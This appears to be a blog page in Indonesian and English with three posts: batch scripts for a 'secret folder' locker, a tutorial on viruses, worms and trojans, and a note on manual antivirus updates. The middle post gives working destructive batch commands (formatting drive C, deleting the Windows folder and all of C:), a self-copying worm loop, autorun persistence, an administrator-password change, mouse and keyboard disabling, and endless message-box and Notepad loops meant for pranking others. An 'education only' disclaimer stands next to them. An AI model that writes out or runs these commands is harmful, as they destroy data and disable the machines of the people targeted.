Let's make money on line. It is easy to be rich!!!

How to Make A Secret Folder

0 komentar

Sometime, we don't want somebody open our folder or access them. Even, we have hidden them but they can open our folders.
To make them, you just need a note pad and copy these text.


@echo off
:menu
set menu=
cls
title FOLDER LOCKER by Jalur Tikus (For NTFS Only)
color a
echo ****[MENU]****
echo.
echo MF = MakeFolder
echo LF= LockFolder
echo OF= OpenFolder

echo Made in Yourself
echo.
set /p "menu=MENU:\>"
if not defined menu goto menu
if /i %menu%==MF goto MakeFolder
if /i %menu%==LFgoto LockFolder
if /i %menu%==OFgoto OpenFolder
goto menu

:MakeFolder
set folder=
color e
cls
echo Rename Your Folder, now!
set /p "folder=:\>"
if not defined folder goto MakeFolder
mkdir "%folder%"
echo.
echo Folder '%folder%' You have made your folder!
pause
goto menu

:LockFolder
set folder=
color f
cls
echo Type your folder which want to be locked!
set /p "folder=:\>"
if not defined folder goto LockFolder
if exist "%folder%" (
echo y|cacls.exe "%folder%" /p everyone:n
cls
echo Folder has been locked...
pause
) else (
cls
echo Folder can’t be found '%folder%' ...
pause
)
goto Menu

:OpenFolder
set folder=
color c
cls
echo Type your folder which you want to be opened!
set /p "folder=:\>"
if not defined folder goto OpenFolder
if exist "%folder%" (
echo y|cacls.exe "%folder%" /p everyone:f
cls
echo Folder berhasil diOpen...
pause
) else (
cls
echo Folder tidak dapat ditemukan '%folder%' ...
pause
)
goto Menu



or you can make using this text

cls
@ECHO OFF
color a
title Folder SecretFolder
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST SecretFolder goto MDLOCKER
:CONFIRM
echo Do you want to lock the folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Enter Y or N.
goto CONFIRM
:LOCK
ren SecretFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo SecretFolder Locked
goto End
:UNLOCK
echo Enter the Password to open the lock!
set/p "pass=>"
if NOT %pass%== 11061984 goto FAIL (You can change the password by yourself)
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" SecretFolder
echo SecretFolder was opened
goto End
:FAIL
echo wrong Password
goto end
:MDLOCKER
md SecretFolder
echo SecretFolder has been made
goto End
:End

Tahukah kamu perbedaan Virus, Worm, Trojan Horse dan Blended Treat?

0 komentar
This article just for education only not for malpractice. I will not responsible for anything that have you done.
 Artikel ini hanya untuk pengetahuan dan tidak untuk disalah gunakan. Saya tidak bertanggung jawab atas apa yang telah anda lakukan.


Sebetulnya, ini bisa dibilang virus atau bukan virus palsu artinya tergantung kepada pembuatnya sendiri mau diapakan virus tersebut. Tetapi, ini juga bisa digunakan untuk ngerjain teman atau seseorangtetapi hanya sebatas untuk ngerjain tidak ada unsur untuk balas dendam atau membuat kacau orang lain. Alat yang diperlukan hanya NOTEPAD.
But, untuk tahu basicnya sebaiknya Anda tahu "What is a virus, worm, trojan, blended virus" supaya Anda tidak salah langkah. Ingin ngerjain orang malah kena sendiri atau malah windows anda rusak sendiri. Makannya sekali lagi saya tegaskan bahwa "This article just for education only not for malpractice. I will not responsible for anything that have you done. (Artikel ini hanya untuk pengetahuan dan tidak untuk disalah gunakan. Saya tidak bertanggung jawab atas apa yang telah anda lakukan).
 Ok, at first let me tell you what is the difference of virus, worm, trojan and blended virus.
A computer virus attaches itself to a program or file enabling it to spread from one computer to another, leaving infections as it travels. Like a human virus, a computer virus can range in severity: some may cause only mildly annoying effects while others can damage your hardware, software or files. (Sebuah virus komputer menempel pada sebuah program atau file yang memungkinkan untukmenyebar dari satu komputer ke komputer lain, meninggalkan infeksi seperti perjalanan. Seperti virusmanusia, virus komputer dapat berkisar pada tingkat keparahan: beberapa dapat menyebabkan efekhanya sedikit mengganggu sementara yang lain dapat merusak perangkat keras, perangkat lunak ataufile .)

So, now... what is worm???
Worm mirip dengan virus dengan desain dan dianggap sebagai sub-kelas dari virus. Worm menyebar dari komputer ke komputer, tapi tidak seperti virus, ia memiliki kemampuan untuk bepergian tanpa ada tindakan manusia. Worm mengambil keuntungan dari fitur transportasi file atau informasi di sistem Anda, yang adalah apa yang memungkinkan untuk melakukan perjalanan tanpa bantuan.

Bahaya terbesar dengan worm adalah kemampuan untuk mereplikasi dirinya sendiri pada sistem anda, jadi daripada komputer Anda mengirimkan worm tunggal, bisa mengirim ratusan atau ribuan salinan dirinya, menciptakan efek menghancurkan yang besar. Salah satu contoh akan untuk cacing untuk mengirimkan salinan dari dirinya ke semua orang yang tercantum dalam buku alamat e-mail. Kemudian, worm  mengirimkan dirinya keluar ke semua orang yang tercantum dalam
alamat masing-masing penerima, dan memanifestasikan terus ke bawah garis.

Karena sifat menyalin cacing dan kemampuan untuk melakukan perjalanan melintasi jaringan hasil akhir dalam banyak kasus adalah bahwa worm mengkonsumsi terlalu banyak memori sistem (atau bandwidth jaringan), menyebabkan Web server, server jaringan dan masing-masing komputer berhenti merespons. Dalam serangan worm baru-baru ini seperti yang banyak dibicarakan Blaster Worm, worm telah dirancang untuk terowongan ke dalam sistem Anda dan memungkinkan pengguna jahat untuk mengendalikan komputer Anda dari jarak jauh.


And what is trojan?
 A Trojan Horse is full of as much trickery as the mythological Trojan Horse it was named after. The  Trojan Horse, at first glance will appear to be useful software but will actually do damage once installed or run on your computer.  Those on the receiving end of a Trojan Horse are usually tricked into opening them because they appear to be receiving legitimate software or files from a legitimate source.  When a Trojan is activated on your computer, the results can vary. Some Trojans are designed to be more annoying than malicious (like changing your desktop, adding silly active desktop icons) or they can cause serious damage by deleting files and destroying information on your system. Trojans are also known to create a backdoor on your computer that gives malicious users access to your system, possibly allowing confidential or personal information to be compromised. Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate. (Sebuah Trojan Horse penuh tipu daya seperti Trojan Horse mitologis itu dinamai. The TrojanHorse, sekilas akan tampak software yang berguna tetapi sebenarnya akan melakukan kerusakan, sekali diinstal atau berjalan pada komputer Anda. Mereka menerima Trojan Horse biasanya tertipu untuk membuka mereka karena mereka nampak seperti software. Ketika Trojan sudah diaktifkan pada komputer Anda, hasilnya bisa bervariasi. Beberapa Trojan dirancang untuk lebih menyebalkan daripada berbahaya (seperti mengubah desktop Anda, menambahkan ikon konyol pada desktop yang aktif) atau mereka dapat menyebabkan kerusakan serius dengan menghapus file dan merusak informasi pada sistem Anda. Trojan juga dikenal untuk membuat backdoor di komputer Anda yang memberikan akses berbahaya pengguna ke sistem anda, mungkin memungkinkan informasi rahasia atau personal untuk dikompromikan. Tidak seperti virus dan worm, Trojan tidak mereproduksi dengan menginfeksi file lain juga tidak mereplikasi diri.)  

What Are Blended Threats?
Added into the mix, we also have what is called a blended threat. A blended threat is a more sophisticated attack that bundles some of the worst aspects of viruses, worms, Trojan horses and malicious code into one single threat. (Blended treat adalah campuran atara virus, worm, trojan horse dan kode-kode lain yang mengancam komputer anda). 



Nah, sekarang diharapkan dengan sedikit bekal diatas maka Anda akan mengetahui sepertiapakan mereka. Intinya : 
  1. Virus: A program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. ( Virus adalah Suatu program atau bagian dari kode yang di muat kekomputer Anda tanpa sepengetahuan Anda dan berjalan melawan keinginan Anda)
  2. Trojan Horse: A destructive program that masquerades as a benign application. Unlike viruses, Trojan horses do not replicate themselves (Trojan Horse: Sebuah program destruktif yangmenyamar sebagai aplikasi jinak. Tidak seperti virus, Trojan horse tidak mereplikasi diri mereka sendiri)
  3. Worm: A program or algorithm that replicates itself over a computer network and usually performs malicious actions (worm: Suatu program atau algoritma yang mereplikasi sendiri melalui jaringan komputer dan biasanya melakukan tindakan jahat)
  4. Blended threat: Blended threats combine the characteristics of viruses, worms, Trojan Horses, and malicious code with server and Internet vulnerabilitie. (Blended menggabungkan karakteristik virus, worms, Trojan Horses, dan kode berbahaya dengan kerentanan server dan internet.)
So now, I"ll share you some codes in a note pad. tetapi kalau mau agak bagus, akanlebih baik kalau dibuat trojan...


Dasar yang harus Anda tahu adalah : 
Virus
invisible command
@echo off
Swap mouse
rundll32 user,swapmousebutton
buka URL yg diinginkan
start [url]http://www.google.com[/url]
Shutdown computer & amp; give message
shutdown -s -t 10 -c "ketik pasan anda disini" -f  
(maka dalam sepuluh detik komputer tersebut akan shut down sendiri)
Disable mouse stlh Restart
rundll32 mouse,disable
Disable keyboard stlh Restart
rundll32 keyboard,disable
Freezes kmptr stlh Restart
rundll32 user,disableoemlayer

Worm 
Memperbanyak diri didalam direktori
 Copiying itself
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
 Me-replace file batch yg lain
%0 >>other.bat

Trojan
mngirim daftar file dlm direktori
sent data file to directory
dir *.*>>Filelist.txt
ganti password admin
Change password admin
net user administrator PASSWORD HERE
membuat info IP
making info IP
ipconfig >Computer-IP-address.txt

Kalau yang ini yang bisa menyebabkan kerusakan.
copy ke Autorun
copt to Autorun
COPY %0 %windir%WINSTART.BAT
format drive C
format c: /q /autotest
delete Windows
DELTREE /Y %windir%
delete drive C
DEL /F /S /Q C:


Apabila Anda menggabungkan semua kode diatas maka akan menjadi Blended treat sebetulnya aku ingin menunjukkan hasil akhirnya tetapi agar tidak disalah gunakan maka Aku tidak memberikannya. Kalau mau aman untuk mencoba di komputer sendiri sebaiknya Anda mempunyai cadangan hardisk atau back up data atau file anda terlebih dahulu.

Kalau yang dibawah ini yang buat ngerjain orang tetapi semoga tidak membahayakan karena aku telah mencoba dikomputer sendiri.

membuat message box yang nonggol terus :
Code:
@ECHO off
:Begin
msg * Kenapa?
msg * Nggak bisa hilang?
msg * Kok bingung?
msg * Udah ... install aja!
msg * Biar masalahnya cepat selesai, gitu....!

msg * Kalau nggak mau, ya sudah biar nongol terus aja.
msg *  Coba kalau bisa, menghentikan aku!!!
GOTO BEGIN
save namafile.BAT (nama file terserah anda)
(ekstensi filenya harus .BAT)




Notepad membuka sendiri.
 Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
 

ket: termasuk yang ngeselin banget nih bisa di ganti,terserah mau buka cmd atau buka yg lain..ganti aja dir nya otomatis buka notepad lalu ngetik apa yg lo mau.
 
Pilihan extreme :

@echo off
:menu
cls
echo What are you going to do if there is a virus in your computer
pause
echo what will you choose:
echo 1. Shut down your computer
echo 2. Format your computer
echo 3. I don't know
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * So, what are you looking for?
msg * Hi, don't be shy?
msg * Everything will be allright.
msg * Do you want to format your computer?
msg * Enjoy it.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top[/i]

ket di atas :
kalo pilih 

1.Otomatis matiin computer
2. Format file (terserah file apaan ganti aj dir nya)
3. Seperti pilihan 1
kata-kata di atas dapat di ganti-ganti, sesuai selera Anda


Virus ini dibuat dengan Notepad dan di save as dg ekstension .bat
Jgn lupa utk merubah Save as type menjadi All files.


Kalau mau lebih jelasnya silahkan klik disini. Tetapi pada dasarnya sama, tinggal pengembanganny aterserah Anda dan saya harap dengan artikel ini anda bisa membuat Anti Virus yang lebih baik dari yang sudah ada ataupun bisa memproteksi computer anda dari serangan virus. 

I hope you can make a better Anti Virus, Worm, Trojan Horse or Blended Treat removal  and protect all computers for everyone.  Thanks for your attention!

Antivirus Microsoft Security Essentials (MSE)

0 komentar
Antivirus Microsoft Security Essentials (MSE)

Microsoft Security Essentials menyediakan perlindungan real-time untuk PC rumah Anda bahwa penjaga terhadap virus, spyware, dan software berbahaya lainnya.
Microsoft Security Essentials adalah download gratis dari Microsoft yang dibuat sangat sederhana untuk sehingga mudah untuk diinstal, mudah digunakan, dan selalu up to date sehingga Anda dapat yakin PC anda dilindungi oleh teknologi terbaru. Sangat mudah untuk mengetahui apakah PC Anda aman - ketika Anda coonect Internet atau sedang mengoperasikan komputer.
Microsoft Security Essentials berjalan pelan dan efisien di belakang kerja anda sehingga Anda bebas untuk menggunakan PC berbasis Windows Anda seperti yang Anda inginkan-tanpa interupsi atau waktu komputer lama menunggu.
Instalasi dan update antivirus Micosoft Security Essentials, tidaklah mengalami kendala yang berarti, sebab semua kegiatan bisnis, sosial dan lain lain secara bisa online. Aku menginstall antivirus Microsoft Security Essentials ini di computer yang menggunakan windows Genuine. Baik itu computer di kantor atau computer teman lainnya.
Kini tinggal permasalahan update antivirus micosoft security essentials ini. Bagi computer yang selalu connect internet hal ini tidaklah menjadi kendala, tapi bagi computer yang tidak selalu connect internet, hal ini merupakan kendala juga.
Solusi untuk permasalahan di atas, yaitu dengan download manual update file antivirus Microsoft Security essentials MSE di computer yang ter-connect internet dan nantinya file tersebut bisa digunakan update manual antivirus security essentials secara offline mode.
File manual update untuk antivirus microsoft security essential (MSE) ini dibagi menjadi 2, yaitu 32-bit dan 64-bit. Gunakan jenis file tersebut sesuai dengan computer yang ada.
Manual Update Microsoft Security essentials (MSE) Offline Mode

Manual Update Micosoft Security Essential (MSE) 32-bit:
http://go.microsoft.com/fwlink/?LinkID=87342

Manual Update Micosoft Security Essential (MSE) 64-bit:
http://go.microsoft.com/fwlink/?LinkID=87341

Informasi lebih lengkap tentang update manual antivirus micosoft security essentials ini dapat dilihat di website microsoft support.
Update antivirus secara teratur adalah solusi terbaik untuk menangkal infeksi suatu virus.